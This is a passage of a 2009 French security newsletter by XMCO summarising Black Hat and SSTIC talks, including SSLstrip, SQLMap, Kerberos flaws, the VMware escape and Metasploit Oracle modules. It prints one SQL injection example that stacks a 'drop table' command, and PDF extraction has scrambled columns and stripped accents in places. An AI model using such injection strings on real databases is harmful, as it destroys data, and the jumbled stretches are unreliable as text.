Vous êtes sur la page 1sur 48

LACTUSCU 23

0-DAY, GUMBLAR, KOOBFACE, ANTI-SEC : QUAND LES


PIRATES PASSENT A L'ACTION...

S OM M AIR E
L e s m eilleures confrences des der nires semaines la lo u p e :
B lack H a t A m s t e rd a m /U SA e t SSTIC 2009.

R e t o u r su r les at t aq u es Gu mbla r, Koobf a c e e t Slowloris

Lactualit du mois : An ti -Sec et vulnr abilit 0 day, patch Mic ro s o f t ,


P H P M y A d m i n , Slowlaris, Safari local file access, Local root Linux, Tro j a n
S ky p e . . .

Les blogs , le s logic ie ls e t l e s e x te n s i o n s s c u r i t . . .

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [1]
LACTU SCU N23

Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS

Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley

Veille en vulnrabilits
Suivi personnalis des vulnrabilits et des correctifs affectant votre Systme d'Information

Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware

Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?

Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.

propos du cabinet Xmco Partners

Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.

Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/


WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [2]
LEDITO N U M R O2 3

ZERO POINTE!!
Zro point ! Telle est la note l'argent, que par la scurisation des systmes. Notre scurit dpend
accorde Dan Kaminsky et systmes informatiques. L'un des aussi fortement de celle de notre
encore une fois Kevin Mitnick... principaux symptmes est que les FAI, de notre hbergeur, de notre
Celui qui donne cette mauvaise diteurs divisent la problmatique webmail, de la scurit du code de
note, c'est le groupe de hackers scurit en parts de march. Cette nos logiciels CMS, etc. Tout est li :
anonymes Zero For Owned division augmente videmment le si une carte s'croule, le chteau
(littralement : zro pour ceux qui chiffre d'affaires, mais n'est pas tombe. C'est vident, mais certains
se sont faits pirater leurs forcment bnfique pour la l'oublient du fait de leur approche
systmes). Quelques jours trop "primtrise". Qui n'a
avant le coup d'envoi de la jamais entendu, "non, ce
grand-messe BlackHat Las problme est un problme
Vegas, ce groupe a publi rseau, cela ne nous
une srie d'articles dans le regarde pas ici aux
pur style "hacking". Ces tudes".
articles dmontrent que le
groupe a pu s'introduire Pour complter cet t
dans les systmes de Kevin meurtrier, je vous invite
Mitnick, de Dan Kaminsky et lire notre article sur le
de plusieurs autres groupe Anti-Sec qui a
personnes comme un pirat la socit
chercheur franais dont on spcialise en scurit
taira le nom par patriotisme. informatique Matasano
scurit relle. Or il sagit d un seul
Tout le monde en prend pour son avec un 0-day SSH....
ensemble, tel un chteau de cartes.
grade dans les commentaires.
Un botier DLP (Data Leakage
Nous vous souhaitons tous une
Prevention) ne protgera que le
Au-del de l'intrusion au sein des excellente rentre.
chiffre d'affaires des intgrateurs.
emails perso des protagonistes,
Le groupe fait galement
Zero For Owned fait remarquer que
remarquer que notre scurit ne
l'industrie de la scurit est malade, " Frdric Charpentier
dpend pas que de nous et de nos
car elle est plus intresse par " Directeur technique XMCO
efforts de scurisation des

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [3]
BLOG,
BLACKHAT, SSTIC 09
EXTENSION,ET
LOGICIEL SECU
P. 5
P. 43
GUMBLAR P. X
ET LES SOMMAIRE
REDIRECTIONS JS
P. 18 Les confrences Blackhat et SSTIC............5
Rsum des meilleures confrences de cet t

Gumblar et les redirections Javascript......18


Prsentation et explications de l'attaque et de ses
consquences

KOOBFACE, LE VER SOCIAL P. 23 Koobface, le virus qui cherchait des


amis.....................................................................23
Analyse du virus et ses particularits

L'ATTAQUE SLOWLORIS L'attaque Slowloris.......................................29


Retour sur la vulnrabilit

P. X P. 29
LActualit scurit du mois........................33
Analyse des vulnrabilits et des tendances du
moment

Les Blogs, logiciels et extensions

L'ACTUALITE SECU scurit...............................................................43


Nicolas Ruff, PortQry, Urlparams

P. 33 XMCO | Partners

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [4]
L'ACTU SCU N23

BLACKHAT ET SSTIC 09 Blackhat Europe, Blackhat US et


le SSTIC...

Comme chaque anne, XMCO a eu


le privilge d'assister de
nombreuses confrences :
Blackhat meeting Amsterdam,
FIC Lille, SSTIC Rennes.

Malheureusement, nous n'avons


pu nous librer comme lanne
dernire pour assister la
dernire propose au mois
d'aot Las Vegas. Cependant,
nous tenterons de prsenter les
dernires nouveauts de cette
confrence incontournable.

Cet article prsentera donc les


confrences les plus marquantes
de ces derniers mois.

Adrien GUINAULT
Yannick HAMON
XMCO | Partners

Trois confrences importantes ont eu lieu entre le mois Blackhat Europe Asmterdam
d'avril et le mois daot 2009.
SAP Penetration Testing - Mariano Nunez Di
Deux dentre elles, internationales ne sont plus Croce
prsenter : la Blackhat. Elles se sont droules en avril
Amsterdam (Blackhat Europe) et en aot dans un lieu Aprs un rapide passage la prsentation "Fun and
incontournable : Las Vegas (Blackhat US). Games with Mac OS X and iPhone Payloads" trop
ennuyeuse, nous avons pu assister la confrence de
La troisime, nationale, n'a pourtant rien envier aux Mariano Nunez Di Croce, expert SAP. Il y a prsent les
premires : le SSTIC (Symposium sur la Scurit des bases de la scurit du progiciel le plus connu du
Technologies de l'Information et des Communications) march.
est une confrence franaise qui devient au fil des Il faut reconnatre que ce type de progiciel, coeur de
annes une rfrence incontournable. mtier de nombreuses entreprises, n'est jamais une
cible de choix pour nos collgues consultants. En effet,
Petit aperu des confrences qui nous ont marques. la peur de l'arrt ponctuel de SAP rend les RSSI
WWW.XMCOPARTNERS.COM

anxieux. Les tests dintrusion se limitent donc souvent


au contrle des droits d'accs.

De plus, peu de whitepapers ou d'informations sur


lintrusion des systmes SAP sont disponibles: peu de
chercheurs ou de consultants prennent la peine
d'approfondir toutes les possibilits dun test
d'intrusion SAP.

M.Nunez Di Croce est justement rentr dans le vif du


sujet en prsentant un grand nombre d'astuces utilises
lors de ses pentests SAP et en publiant la version 1.0
de son script d'audit ddi SAPYTO.py.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [5]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Tout au long d'un speech dynamique et agrment de Lorsque la premire page dune webmail est en HTTP
dmonstrations, M.Nunez prsente la dcouverte des avec un formulaire dauthentification qui soumet le login
cibles SAP, l'audit de vulnrabilit et l'exploitation des et le mot de passe vers un lien en HTTPS, le pirate
failles SAP. ralise une attaque Man In The Middle au tout dbut
M.Nunez dtaille les plug-ins de son outil jusqu'au de la transaction et modifie la rponse du serveur en
patch pour John The Ripper pour cracker les mots de remplaant ce lien par un lien HTTP. Ce procd a
passe des tables Oracle USR02 (utilisateurs SAP). pour but de supprimer la phase d'authentification du
serveur web par la couche SSL. Ainsi, le navigateur
On a regrett cependant que cette confrence ne soit n'affiche pas d' alerte qui prcise que le certificat est
quune volution de sa prsentation de 2007 invalide.
comportant des amliorations (certes notables) de loutil
SAPYTO.

Whitepaper :
http://www.blackhat.com/presentations/bh-europe-09/
DiCroce/BlackHat-Europe-2009-DiCroce-CYBSEC-
Publication-SAP-Penetration-Testing.pdf

Cette action est totalement transparente pour


lutilisateur, qui, son insu, enverra ses identifiants en
clair. Le pirate intercepte ces donnes et ralise ensuite
une connexion HTTPS vers le serveur web grce aux
Stripping SSL To Defeat HTTPS In Practice - identifiants subtiliss. Ds lors, le pirate relaiera le
Moxie Marlinspike
trafic de la victime qui peut ne pas remarquer que sa
connexion est en HTTP avec le pirate. Pour amliorer la
Nous avons ensuite assist plusieurs autres
discrtion de son attaque, le pirate peut placer un
confrences trs intressantes et notamment la
favicon.ico (icne affiche dans la barre d'URL)
prsentation d'une technique pour raliser les attaques
reprsentant un petit cadenas. La victime pensera alors
"Man In The Middle". Cette confrence, dj
que la transaction sest ralise de manire scurise
prsente au dbut de lanne, avait fait parler d'elle
puisquelle voit un cadenas ;)
par sa simplicit d'utilisation et a remis au got du jour
les attaques de lhomme du milieu.
Mme si l'attaque peut paratre simpliste et mme si
Le principe de cette attaque repose ici sur linattention
cette dernire avait dj t imagine auparavant,
de la victime ainsi que sur une astuce mene par le
personne n'avait dvelopp un outil ralisant lintgralit
pirate qui se place entre sa victime et le site web visit.
de l'attaque. Cest dsormais chose faite. L'auteur a
WWW.XMCOPARTNERS.COM

L'auteur
d'ailleurs profit de la Blackhat pour utiliser son outil : la
a d'ailleurs profit de la dizaine de mots de passe subtiliss le jour mme et
affich l'cran faon wall of sheeps dans les
Blackhat pour utiliser son outil : la dizaine derniers slides de sa prsentation ont d en effrayer
de mots de passe subtiliss le jour mme et plus dun...
affich l'cran faon wall of sheeps
dans les derniers slides de sa prsentation Les dtails de cette prsentation sont disponibles
ladresse suivante :
ont d effrayer quelques auditeurs...
Slides : http://www.blackhat.com/presentations/bh-
Lorsquun site web implmente une partie HTTP et une europe-09/Marlinspike/blackhat-europe-2009-
partie HTTPS, le pirate intercepte chaque requte marlinspike-sslstrip-slides.pdf
envoye par la victime et remplace, la vole, tous
les liens contenant HTTPS par HTTP.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Adva nced SQL Injection exploitation to Taming the Beast : Assess Kerberos-Protected
Operating System Full Control - Bernardo Networks - Emmanuel Bouillon
Damele Assumpcao
Le premier franais passe le grand oral ! Cette anne, 4
Les confrences sur les attaques d'injection SQL ont Franais taient confrenciers la Blackhat. Emmanuel
t vues et revues. Cependant, chaque anne, les Bouillon, expert au CEA (French Atomic Energy
organisateurs continuent d'imposer ce sujet. Cette Commission), a prsent les faiblesses
anne, rien de nouveau, Bernardio Damele d'implmentation de l'authentification Kerberos.
Assumpcao, dveloppeur de l'outil SQLMap, nous a
prsent la nouvelle version de son logiciel. Ce dernier Ce sujet qui n'a pas fait l'actualit avait pourtant de quoi
a t nettement amlior. Les injections SQL sur des plaire. En effet, peu de chercheurs se sont rellement
bases de donnes supportant les "batches queries" intresss Kerberos. Ce dernier est un protocole
en sont un bon exemple. d'authentification et d'autorisation rseau utilisant un
systme de tickets qui repose sur un chiffrement par
Ce nom barbare correspond aux requtes SQL clefs symtriques.
spares par des points virgules, par exemple : Emmanuel Bouillon a men des recherches sur les
diffrentes implmentations du march, sous Unix et
Ex : SELECT name from table1 where sous Windows, afin prsenter les diffrentes attaques
id=9; drop table2; lies ce protocole peu utilis.

La plupart des administrateurs Unix installent Kerberos


en quelques clics sans prendre le soin de comprendre
Si une application vulnrable aux attaques d'injection et de lire prcisment les documentations associes.
SQL utilise une base de donnes supportant les Ce genre d'installation savre souvent vulnrable des
"batches queries" (MySQL avec ASP.NET, PostGreSQL attaques de spoofing de rponses, de rejeu et/ou de
avec ASP, ASP.NET et PHP ou MSSQL avec ASP, Man In The Middle.
ASP.NET ou PHP), alors l'outil SQLMap peut s'avrer
trs utile ; il peut viter au pentester d'y aller la main L'implmentation de Microsoft s'est avre beaucoup
(quoi que chez XMCO, l'utilisation d'outils automatiques plus robuste, mme si une des dernires phases de la
ne constitue pas la panace!). connexion Kerberos a permis M.Bouillon d'identifier

SQLMap a t nettement amlior,


un problme permettant de dpersonnaliser le ticket
d'un autre utilisateur et d'utiliser le compte
Windows d'un autre utilisateur sans connatre le mot
notamment pour les injections SQL sur des
de passe. L'information a t remonte Microsoft qui
bases de donnes supportant les "batches a seulement prcis "It is not a bug, It's a feature!"
queries"...

Bernardo Damele Assumpcao a donc dtaill l'tendue


des nouvelles possibilits offertes aux pirates lors de
l'exploitation de vulnrabilits d'injection SQL : lecture
et criture sur le systme de fichiers, accs complet au
systme attaqu, connexion HTTP distante, attaque
WWW.XMCOPARTNERS.COM

SMBRelay, lvation de privilges (attaque


AccessToken via une injection) et surtout lupload du
Meterpreter de Metasploit !

Slides :
http://www.blackhat.com/presentations/bh-europe-09/
Guimaraes/Blackhat-europe-09-Damele-SQLInjection-
slides.pdf

Whitepaper :
http://www.blackhat.com/presentations/bh-europe-09/
Guimaraes/Blackhat-europe-09-Damele-SQLInjection-
whitepaper.pdf

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![7]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Slides : L'utilisateur saisit le code PIN et son tlphone


http://www.blackhat.com/presentations/bh-europe-09/ rcupre ainsi sa nouvelle configuration. Cest donc
Bouillon/BlackHat-Europe-09-Bouillon-Taming-the- scuris.
Beast-Kerberous-slides.pdf
Roberto Gassira et Roberto Piccirillo indiquent que
Whitepaper : cette mthode de Provisionning peut tre dtourne par
http://www.blackhat.com/presentations/bh-europe-09/ un pirate. Ce dernier envoi un SMS spoof qui contient
Bouillon/BlackHat-Europe-09-Bouillon-Taming-the- un message similaire ceux envoys par l'oprateur
Beast-Kerberous-whitepaper.pdf (code PIN, message indiquant que la configuration du
tlphone sera modifie lors de la rception du
prochain SMS). Le pirate peut ainsi changer la
Hijacking Mobile Data Connections - Roberto configuration du tlphone sa guise. Les chercheurs
Gassira', Roberto Piccirillo ont fait une dmonstration de modification du serveur
DNS du navigateur. Les possibilits offertes sont
Les description dattaques de tlphones mobiles sont cependant bien plus tendues...
particulirement recherches par l'auditoire des
Blackhat, du fait de la dimension mdiatique de telles
dcouvertes...

L'attaque prsente ici est simple et particulirement


astucieuse : les chercheurs ont dmontr quil tait
possible de modifier la configuration d'un tlphone
pour dtourner les connexions web via plusieurs SMS.
Roberto Gassira et Roberto Piccirillo se sont
penchs sur les SMS envoys par les oprateurs pour
reconfigurer automatiquement certains paramtres des
tlphones. Cette mthode, appele "Provisionning",
permet aux oprateurs de modifier les paramtres web
(DNS, APN, configuration MMS...).

Le principe du Provisionning est le suivant :


Un utilisateur reoit un SMS de son oprateur qui lui
indique qu'il va prochainement recevoir une demande
de mise jour de configuration. Ce SMS (1 dans le
schma suivant) contient galement un mot de passe
(PIN) qui sera demand lors de la mise jour du
tlphone. L'oprateur envoie ensuite un message de Cette confrence fut simple, donc efficace, et plutt
configuration (2) qui doit tre valide par la saisie du attrayante.
code PIN prcdemment reu.
Une vido de dmonstration est disponible
l'adresse suivante :
http://www.youtube.com/watch?v=zANM9FxyOlkv
WWW.XMCOPARTNERS.COM

Whitepaper :
http://www.blackhat.com/presentations/bh-europe-09/
Gassira_Piccirillo/BlackHat-Europe-2009-Gassira-
Piccirillo-Hijacking-Mobile-Data-Connections-
whitepaper.pdf

Slides :
http://www.blackhat.com/presentations/bh-europe-09/
Gassira_Piccirillo/BlackHat-Europe-2009-Gassira-
Piccirillo-Hijacking-Mobile-Data-Connections-slides.pdf

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![8]
BLACKHAT ET SSTIC 09 LACTU SCU N23

WiShMaster - WIndows SHellcode MASTERy - Tactical Fingerprinting Using Metadata, Hidden


Benjamin Caillat Info and Lost Data - Chema Alonso, Enrique
Rando
Benjamain Caillat est chercheur et professeur
l'ESIEA. Nous recommandons dailleurs tous les
jeunes amateurs de scurit, l'excellent mastre Aprs quelques confrences trs pointues, Chema
spcialis dans la scurit de l'ESIEA. Alonso et Enrique Rando ont permis de soulager nos
neurones en faisant une prsentation attrayante sur la
En outre, depuis quelques semaines, le challenge recherche d'informations au sein des meta-donnes
Securitech propos en 2005 est maintenant disponible des fichiers Office.
sous forme d'une Vmware l'adresse suivante : http://
www.challenge-securitech.com/ Aprs quelques exemples amusants concernant des
noms d'utilisateurs soutirs de documents Word issus
de l'administration de Tony Blair qui ont t publis
sur Internet, les deux compres ont introduit leur sujet
en dfinissant les termes Metada, Hidden Information et
Lost Data.

Il n'est pas rare de trouver au fin fond de documents


Word, des donnes sur l'organisation, sur l'auteur du
document, sur les chemins de fichiers contenant des
noms d'utilisateurs, sur les noms NETBIOS, sur les
adresses IP ou sur des noms d'imprimantes, sur des
noms de serveurs ou sur des liens vers des partages
de fichiers...

Ces informations ne sont pas facilement accessibles via


un diteur de texte classique. L'utilisation d'outils
comme BinText ou la commande Unix string
constitue une premire possibilit.
Revenons la prsentation. Benjamin Caillat a
prsent ses travaux sur le dveloppement d'un Afin de faciliter cette recherche d'informations, Chema
framework de "Shellcodisation" : Windows Shellcode Alonso et Enrique Rando ont dvelopp un outil baptis
Mastery (WiShMaster). L'objectif de ce framework est FOCA. Ce dernier permet d'extraire toutes les meta-
de transformer un programme en une srie d'instruction donnes et toutes les informations caches puis de
Assembleur appele "Shellcode" tout en offrant du corrler les informations dcouvertes pour les afficher
polymorphisme protgeant le code gnr contre les tries au sein de l'interface du logiciel. Les rsultats
analyses manuelles et les antivirus. permettent ainsi d'avoir une vision du rseau, des
Une prsentation trs technique a dtaill les besoins utilisateurs, etc.
actuelles de la "Shellcodisation" dans le domaine de la
Virologie. Ce logiciel est disponible l'adresse suivante : http://
www.informatica64.com/FOCA/
Whitepaper :
WWW.XMCOPARTNERS.COM

http://www.blackhat.com/presentations/bh-europe-09/
Caillat/BlackHat-Europe-09-Caillat-Wishmaster-
whitepaper.pdf

Slides :
http://www.blackhat.com/presentations/bh-europe-09/
Caillat/BlackHat-Europe-09-Caillat-Wishmaster-
slides.pdf

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![9]
BLACKHAT ET SSTIC 09 LACTU SCU N23

OpenOffice Security Design Weaknesses - Eric


La prsentation s'est conclue par un conseil : nettoyer Filiol and Jean-Paul Fizaine
les documents avant de les envoyer aux clients.
Comme l'anne prcdente, la Blackhat Europe 2009
Microsoft fournit d'ailleurs un outil pour cela, appel s'est conclue par une prsentation de M. ric Filiol et de
Remove Hidden Data. Il est disponible l'adresse Jean Paul Fizaine sur le sujet de la scurit d'Open
suivante : http://support.microsoft.com/kb/834427/fr Office. Dommage que la dernire prsentation de la
journe nait t suivie que par un auditoire restreint,
car les dcouvertes prsentes taient trs
intressantes.

M.Filiol et M.Fizaine nous ont prsent les problmes


de scurit lis Open Office dans sa version 3, plus
particulirement les possibilits de diffusion de virus par
ce type de document.

Aprs une prsentation thorique du fonctionnement


des signatures et des mthodes de chiffrement
utilises, plusieurs dmonstrations surprenantes ont
permis de cerner les principaux problmes de scurit
de cette suite bureautique.

Les deux chercheurs nous apprennent qu'aucun


contrle d'intgrit n'est ralise sur le fichier
dfaut d'tre trs pointue, la prsentation ft bien manifest.xml (qui constitue la base d'un fichier Open
mene et illustre d'exemples amusants qui ont sans Office et qui dcrit l'arborescence d'un fichier .odt). Il
doute plu l'auditoire. est donc possible l'aide d'un simple logiciel de
compression et d'un diteur de texte d'ajouter une

FOCA permet d'extraire toutes les meta-


macro dans un document sain.

De mme, les mcanisme de chiffrement et de


donnes et toutes les informations caches, signatures peuvent tre contourns par des virus afin
corrle les informations dcouvertes pour de modifier le contenu d'un document.
les afficher tries au sein de l'interface du Les chercheurs nous ont dmontr avec quelle facilit,
un virus pourrait remplacer une macro lgitime par une
logiciel...
macro malicieuse au sein d'un document chiffr.

Whitepaper :
Whitepaper :
http://www.blackhat.com/presentations/bh-europe-09/
http://www.blackhat.com/presentations/bh-europe-09/
Alonso_Rando/Blackhat-Europe-09-Alonso-Rando-
Filiol_Fizaine/BlackHat-Europe-09-Filiol-Fizaine-
Fingerprinting-networks-metadata-whitepaper.pdf
OpenOffice-Weaknesses-whitepaper.pdf
WWW.XMCOPARTNERS.COM

Slides :
Slides :
http://www.blackhat.com/presentations/bh-europe-09/
http://www.blackhat.com/presentations/bh-europe-09/
Alonso_Rando/Blackhat-Europe-09-Alonso-Rando-
Filiol_Fizaine/BlackHat-Europe-09-Filiol-Fizaine-
Fingerprinting-networks-metadata-slides.pdf
OpenOffice-Weaknesses-slides.pdf

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![10]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Blackhat USA/Defcon Breaking the "Unbreakable" Oracle with


Metasploit - Chris Gates
La BlackHat USA est devenue LA rfrence des Chris Gates tait trs attendu par les pentesteurs. Une
confrences. Comme son habitude, cette dernire vido allchante avait dj t publie en fvrier 2009.
s'est droule au Ceasars Palace. Impossible de Elle montrait l'utilisation de nouveaux modules
dcrire toutes les confrences, mais voici les plus Metasploit pour s'introduire au sein d'une base Oracle.
importantes.

Chris Gates a fait une dmonstration de ses nouveaux


modules : ces derniers sont capables de brute-forcer
les SID protgs (ora_sid_brute_tns), les comptes
Oracle (brute_demo), dobtenir une lvation de
privilges pour obtenir des droits DBA (administrateur
de la base de donnes), dajouter les privilges
JAVASYSPRIX (via le module oracle_sql), duploader
un exploit (via oracle_win32exec) et dexcuter ce
dernier via psexec afin d'obtenir un shell sur le systme
Windows attaqu...(ndlr : du lourd !)

La plupart des mthodes d'exploitation ne sont pas


nouvelles et peuvent tre exploites via d'autres outils.
La nouveaut vient du fait que toute l'attaque pourra
dornavant tre ralise automatiquement via l'outil
Something about Network Security - Dan Metasploit et qu'elle aboutira la prise de contrle
Kaminsky distance du systme.

Une des confrences les plus attendues tait bien Ces modules peuvent galement contourner les
entendu celle de Dan Kaminsky, devenu clbre la dtections de l'IDS Snort en encodant les donnes
suite de la publication d'une faille critique du protocole envoyes.
DNS en 2008. Cette fois-ci, Dan s'est intress aux
certificats x509 et la manire dont le Common Name Vido :
des certificats est gr par les diffrents navigateurs du http://it.toolbox.com/blogs/managing-infosec/hacking-
march. Il a prsent une attaque sur les certificats oracle-with-metasploit-29936
signs en MD2. Il serait alors possible de faire croire
aux librairies des navigateurs (notamment NSS de
Mozilla) quun certificat est valide.

La faille prsente par ce chercheur dmontre que les


navigateurs acceptent le caractre null byte (\0) comme
l'quivalent du wildcard (*) dans les certificats. Des
certificats frauduleux sont alors considrs comme
valides. Cette attaque est connue sous le nom de "SSL
WWW.XMCOPARTNERS.COM

null byte poisoning" et est rfrence sous le code


CVE-2009-2408.

Cette vulnrabilit, qui cible initialement les


navigateurs, affecte galement les logiciels de
messagerie comme FetchMail (CVE-2009-2666 : http://
cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2666)

Dan Kaminsky sest galement rendu clbre, cet t,


en se faisant pirater sa messagerie par le groupe ZF05
(http://www.rec-sec.com/files/zf05.txt).

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![11]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Lockpicking Forensics - Datagram


Sniffing Keystrokes With Lasers/Voltmeters -
Andrea Barisani et Danielle Bianco
Chaque anne, des dmonstrations de lockpicking
Attaques hardware avec l'coute des frappes de clavier (ouverture de serrures sans possder la clef) sont
PS/2 ? Des chercheurs ont dmontr par deux prsentes. L'auditoire raffole de cette technique
mthodes diffrentes qu'il tait possible d'espionner la impressionnante utilise par Jack Bauer et tous les
saisie d'un utilisateur sur un clavier plus de 20 espions pour s'infiltrer dans des btiments ultra
mtres de distance. De nombreuses recherches ont scuriss!
dj t menes sur ce sujet baptis TEMPEST
(Transmitted Electro-Magnetic Pulse/Energy Standards Le speaker a introduit un sujet peu connu, le
and Testing). lockpicking forensic . Il consiste dterminer les
mthodes qu'ont utilises les malfrats pour s'introduire
dans un btiment cambriol. Le speaker a montr au
travers des cas pratiques comment une tude post-
mortem des serrures pouvait conduire dterminer le
type d'outils utiliss lors de l'intrusion et le niveau de
l'attaquant.

Que ce soit par les rayonnements mis par les cbles


lectriques ou par mesure des manations
acoustiques, des pirates pourraient, dans des
conditions idales retrouver des caractres et dans le
pire des cas, des phrases entires.

Ce type d'attaque trs intressante reste tout de mme


trs limit dans le monde rel...

Whitepaper :
WWW.XMCOPARTNERS.COM
http://www.blackhat.com/presentations/bh-usa-09/
DATAGRAM/BHUSA09-Datagram-LockpickForensics- Photos des goupilles (mcanisme constituant certaines
PAPER.pdf serrures) aprs effraction

Slides :
http://www.blackhat.com/presentations/bh-usa-09/ Whitepaper :
DATAGRAM/BHUSA09-Datagram-LockpickForensics- http://www.blackhat.com/presentations/bh-usa-09/
SLIDES.pdf DATAGRAM/BHUSA09-Datagram-LockpickForensics-
PAPER.pdf

Slides :
http://www.blackhat.com/presentations/bh-usa-09/
DATAGRAM/BHUSA09-Datagram-LockpickForensics-
SLIDES.pdf

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![12]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Cloudburst : Hacking 3D (and breaking Out of Quid du reste ?


VMware) - Kostya Kortchinsky
N o u s a v o n s i d e n t i fi d a u t r e s p r s e n t a t i o n s
La confrence de Kostya Kortchinsky, chercheur chez classiques comme le panorama du cybercrime en
Immunity Inc. constituait un moment trs attendu. Une Russie (Fighting Russian Cybercrime Mobsters: Report
vulnrabilit dcouverte fin 2008, permettait d'excuter from the Trenches - DMITRI ALPEROVITCH, KEITH
du code partir d'une machine invite sur une machine MULARSKI), le tour d'horizon des fuzzers et des
hte. Kostya nous avait dj mis l'eau la bouche en techniques associes (Demystifying Fuzzers - Michael
annonant sa dcouverte sur son blog. Eddington) ou encore la prsentation quasi-annuelle de
Felix Lindner sur l'exploitation des failles des routeurs.
Les deux vulnrabilits prsentes Enfin, la prsentation de Jeremiah Grossman, travers
dexemples trs amusants (comme son habitude) sur
permettent d'interagir, partir d'une les diffrentes manires de faire de l'argent
VMware invite, sur la mmoire de la lorsquon fait partie du ct obscur de la force.
machine hte...
Nous avons oubli les confrences "Bateau" comme
"Embedded Management Interfaces" au sein de
Les vulnrabilits VMware ne sont pas souvent laquelle des chercheurs de l'universit de Standford ont
mdiatises. VMware corrige silencieusement ses prsent une tude sur les failles des navigateurs web
vulnrabilits et par consquent aucune dmonstration inclus dans la plupart des quipements (imprimantes,
ni exploit n'avait jamais t prsent. Cest chose faite : cadres photos...). Rien de nouveau, tout le monde sait
Kostya a expos le rsultat de ses recherches ainsi que que les applications web sont truffes de failles,
les diffrentes vulnrabilits en question. spcialement sur des serveurs web peu utiliss et
Les deux vulnrabilits taient lies aux fonctionnalits dvelopps trs rapidement en Chine.
3D (mulateur de cartes graphiques). Elles ont permis
d'interagir, partir d'une VMware invite, avec la De mme, "Conficker Mystery" a permis, une fois de
mmoire de la machine hte (la premire faille permet plus de prsenter Conficker, pour ceux qui ont
la lecture, la seconde l'criture). Il sagit donc dune dcouvert linformatique il y a quelques semaines...
vasion de la machine virtuelle.

Ensemble des archives :


Whitepaper : http://www.blackhat.com/html/bh-usa-09/bh-usa-09-
http://www.blackhat.com/presentations/bh-usa-09/ archives.htm
KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-
PAPER.pdf

Slides :
http://www.blackhat.com/presentations/bh-usa-09/
KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-
SLIDES.pdf

Quelques vidos de la vulnrabilit :


http://immunityinc.com/documentation/cloudburst-
WWW.XMCOPARTNERS.COM

vista.html
http://immunityinc.com/documentation/cloudburst-
ubuntu.html

CVE de la vulnrabilit :
http://cve.mitre.org/cgi-bin/cvename.cgi?
name=CVE-2009-1244
http://lists.vmware.com/pipermail/security-announce/
2009/000055.html

Blog de Kostya :
http://expertmiami.blogspot.com/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![13]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Data tainting for malware analysis - Florent


SSTIC MARCEAU (LEXSI)

Voici un bref aperu des confrences qui nous ont le Florent MARCEAU a prsent une plateforme
plus marqus au SSTIC 2009 (www.sstic.org). d'analyse de malwares qui repose sur le suivi de la
propagation des donnes sur un systme (mmoire,
Les lecteurs les plus curieux pourront dcouvrir les priphriques rseau...) : le "data-tainting". Ce procd
articles complets, ainsi qu'une description " chaud / semble plutt efficace et permet d'analyser plusieurs
live" de toutes confrences sur les liens fournis la fin centaines de malwares par jour.
de cet article.

Keynote - Pascal ANDREI (Airbus) Le premier sujet du SSTIC ft li au coeur


de l'actualit du dbut du mois de juin.
Le premier sujet du SSTIC ft li au coeur de l'actualit Pascal Andrei a raliser une prsentation sur la
du dbut du mois de juin. Bien que certains et pu
considrer le sujet comme dplac, l'orateur a remport scurit et la sret des avions Airbus...
un vif succs. Pascal ANDREI a ralis une
prsentation sur la scurit et la sret dans les Cependant, ce n'est pas aussi simple mettre en
avions Airbus. Malheureusement, le service oeuvre et il faut envisager une longue, voire
